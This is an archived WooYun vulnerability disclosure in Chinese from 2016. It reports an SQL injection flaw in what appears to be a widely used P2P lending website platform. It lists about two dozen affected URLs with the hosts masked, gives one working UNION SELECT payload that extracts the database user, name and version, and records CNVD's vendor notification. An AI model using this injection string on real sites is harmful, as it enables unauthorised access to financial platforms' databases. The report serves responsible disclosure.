乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-18: 细节已通知厂商并且等待厂商处理中 2016-03-22: 厂商已经确认,细节仅向厂商公开 2016-03-25: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息) 2016-05-16: 细节向核心白帽子及相关领域专家公开 2016-05-26: 细节向普通白帽子公开 2016-06-05: 细节向实习白帽子公开 2016-06-20: 细节向公众公开
低低调调闭关修炼
最近在渗透P2P站点时,第一感觉这肯定是通用,然后看看,呵呵,挺多人用的。第一处:type_id参数盲入:案例:
*****ode*****1.https://**.**.**/articlelist.pagetype_id=08 SSL_2.https://**.**.**/articlelist.pagetype_id=08 SSL_3.http://**.**.**/articlelist.pagetype_id=20 _4.http://**.**.**/articlelist.pagetype_id=04&type_flg=xwgg_5.http://**.**.**/articlelist.pagetype_id=07_6.http://**.**.**/articlelist.pagetype_id=07_7.http://**.**.**/articlelist.pagetype_id=08_8.http://**.**.**/articlelist.pagetype_id=02&type_flg=xwgg_9.http://**.**.**/articlelist.pagetype_id=08_10.http://**.**.**/articlelist.pagetype_id=08_11.http://**.**.**/articlelist.pagetype_id=02&type_flg=xwgg_12.http://**.**.**/articlelist.pagetype_id=05&type_flg_13.http://**.**.**/articlelist.pagetype_id=01&type_flg=lcgl_14.http://**.**.**/articlelist.pagetype_id=08_*****de&g***************15.http://**.**.**/articlelist.pagetype_id=08_***************147ba14eb07a9e9a49f126.jpg********************^^**********ode*****16.http://**.**.**/articleview.pagearticle_id=269A21DB047D7DC5E050007F01007743&type_id=20&type_flg_17.http://**.**.**/articleview.pagearticle_id=0102dd03-dc4b-11e5-9991-40f2e9d8c09a&type_id=04&type_flg=xwgg_18.http://**.**.**/articleview.pagearticle_id=7e299055e72b11e5a8b440f2e92e2622&type_id=03_19.http://**.**.**/articleview.pagearticle_id=b33cfe94-7e7a-11e4-a50f-40f2e99cef5a&type_id=07&type_flg_20.http://**.**.**/articleview.pagearticleId=851eeb1d-a6f9-11e5-979e-00163e0024e9&type_id=10&type_flg=0&index=3&contentId=851eeb1d-a6f9-11e5-979e-00163e0024e9&contentType=10&type=2_21.http://**.**.**/articleview.pagearticle_id=c4c39d5d-85c3-11e4-912a-94de80cbc04c&type_id=06&type_flg=lcgl_22.http://**.**.**/articleview.pagearticleId=88399c9c-b4db-11e5-884f-1051721b3c39&type_id=10&type_flg=0&index=3&contentId=88399c9c-b4db-11e5-884f-1051721b3c39&contentType=10&type=2_23.http://**.**.**/articleview.pagearticle_id=01833ea8-2549-11e5-9a92-00163e000e7b&type_id=08&type_flg_24.http://**.**.**/articleview.pagearticle_id=89944d3b-7ba4-11e5-9838-1051721d3b60&type_id=01&type_flg=lcgl_25.http://**.**.**/articleview.pagearticle_id=a831146b-e697-11e5-ba53-288023a0e8b4&type_id=08&type_flg_*****cod*****
1.http://**.**.**/
articleview.page?article_id=-1' union all select null,concat(user(),0x7e,database(),0x7e,@@version),null,null,null%23&type_id=01&type_flg=lcgl
上面就是证明
危害等级:高
漏洞Rank:13
确认时间:2016-03-22 15:56
CNVD确认所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。
暂无